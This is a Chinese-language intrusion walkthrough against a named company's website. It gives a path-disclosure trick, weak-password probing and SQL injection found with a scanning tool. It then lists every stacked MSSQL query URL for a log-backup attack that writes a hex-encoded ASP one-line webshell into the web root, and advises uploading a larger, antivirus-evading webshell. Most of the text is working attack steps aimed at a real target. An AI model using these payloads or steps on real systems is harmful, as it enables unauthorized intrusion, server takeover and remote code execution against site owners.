入侵检测芙蓉王实业

目标网站：芙蓉王实业http://www.furongwang.com

首先,还是先对目标网站进行踩点:打开网站的首页,可以看到自动跳转到了http://www.furongwang.com/admin/home.aspx页面.证明网站是用的ASP.NET构架.对于ASPX的网站,我首先想到的是暴出它的WEB路径地址.随便打开一个新闻连接: http://www.furongwang.com/article/ArticleDetail.aspx?articleID=953.然后在最后一个”/”之后加上”~”符号,链接地址变为http://www.furongwang.com/article/~ArticleDetail.aspx?articleID=953回车,可以看到已经暴出了网站的路径了(如下图所示)


也就是F:\7.6nang-frw-pad\这个路径是它网站存放的路径。这里我总结一点：对于aspx后缀的网站，我们可以首先打开它的任意网页，然后在最后面的一个“/”之后加上“~”符号。如果网站程序使用的是ASP.NET2.0以下开发的，多半都会暴出来网站的物理路径了。个人总结的经验哦^_^至于说得到了这个路径有什么用呢？我们下面就会看到。
接下来仍然是大概了解一下网站的目录结构。直接在网站地址后面加上/admin构造地址：http://www.furongwang.com/admin/回车后如下图所示：


说明存在这个目录，再在后面加上/admin/login.aspx回车，出现了登陆窗口，测试弱口令admin / admin未成功。再往下就使用注入工具对网站进行Web程序检测了。我比较喜欢使用阿D的注入工具。这里也不例外。很多情况下Domain检测不到的它都能检测到。在注入点扫描中填写入网站链接地址，很快的就发现了存在注入页面，如下图所示：


那就顺利成章的检测它的注入点的类型和数据库的类型了。检测结果如下图所示：


这样子的结果应当是我们最喜欢看到的了：数据库是MSSQL的。当前权限是SA，说明是最高权限链接的数据库。数据库名称是cdcf，并且支持多句执行。既然是SA权限的。那基本可以肯定这台服务器被我们拿下是迟早的事情了。至于如何拿，方法还是比较多的。我这里就以Lob备份来进行讲解吧：
Log备份的原理是导出日志文件到Web目录来获得shell的备份方法。它的多次备份的成功率比较高，备份出来的shell相比差异备份而言要小。当然了，使用Log备份也是有条件的，首先必须要知道网站的Web路径，这个既然是SA权限的，就应当可以使用阿D的注入工具进行列目录进行查看了，还记得我们刚开始的时候暴出来了网站的目录结构嘛？其实这就为后面的网站路径铺垫了条件。第二个条件是网站和数据库必须在同一个服务器中。
接下来我们就开始使用手工进行Log备份。先在我们的浏览器中打开存在注入点的地址：http://www.furongwang.com/article/ArticleDetail.aspx?articleID=965。然后在后面加上;alter database 库名 set RECOVERY FULL—其中库名我们替换成刚才检测到的数据库的名称：cdcf，也就是构造了一个这样的链接：http://www.furongwang.com/article/ArticleDetail.aspx?articleID=965;alter database cdcf set RECOVERY FULL--。然后回车。等反回了正常页面我们就可以进行下面的备份了。第二步是替换第一步中的语句：;create table cmd (a image)—意思是说创建一个cmd表。同样是在地址栏中进行构造，构造后的完整形式是：http://www.furongwang.com/article/ArticleDetail.aspx?articleID=965;create table cmd (a image)-- 。同样，等反悔正常后我们就可以进行第三步的备份：;backup log 库名 to disk = 'f:\cmd' with init—这里要求注意Web目录在哪个盘就备份到哪个盘路径下。所以我们这里是f盘。构造之后的完整链接地址就是：http://www.furongwang.com/article/ArticleDetail.aspx?articleID=965;backup log cdcf to disk = 'f:\cmd' with init--。现在来到了备份的第四步：;insert into cmd (a) values (0x一句话木马)—这里的0x表示的是十六进制。也就是说我们需要将后面的一句话木马转化为16进制的形式。一句话木马我选择的是<%execute request("value")%>。通过转化为十六进制之后是：3C25657865637574652072657175657374282276616C75652229253E。如下图所示：


构造完后，我们需要提交的地址就变成了：http://www.furongwang.com/article/ArticleDetail.aspx?articleID=965;insert into cmd (a) values (0x3C25657865637574652072657175657374282276616C75652229253E)--。继续提交。之后便来到了备份的第五步：;backup log 库名 to disk = 'Web路径\muma.asp'-- 。这里面库名仍然是替换为数据库的名称cdcf ，Web路径就是F:\7.6nang-frw-pad了。替换之后我们需要提交的内容就变成了：http://www.furongwang.com/article/ArticleDetail.aspx?articleID=965;backup log cdcf to disk = 'F:\7.6nang-frw-pad\muma.asp'-- 。继续提交。到这里我们的备份过程就基本上完毕了。最后一步就是删除掉我们刚才建立的临时表了：;drop table cmd-- 。提交：http://www.furongwang.com/article/ArticleDetail.aspx?articleID=965;drop table cmd-- 。删除临时表cmd。下面就看看我们备份出来的一句话木马是否可以正常使用了。打开一句户木马的连接文件，填写入我们的木马地址，然后点击GO，如下图所示：


接着就会自动跳转到我们的小马文件了：


到这里，基本上说这台服务器的Webshell就已经被我们拿到手了。接下来就是在这个小马上面填写要上传的大马文件了。我在这里上传了一个增强版的老兵站长助手木马。这里大家最好选择一个具有免杀效果的木马文件。进入我们的WebShell之后如下图所示：


至此。我们的全部入侵工作就结束了。下面是否提权我就不在这里进行讲解了。网站企业比较大。我通知服务器管理员要他们进行修补相关漏洞。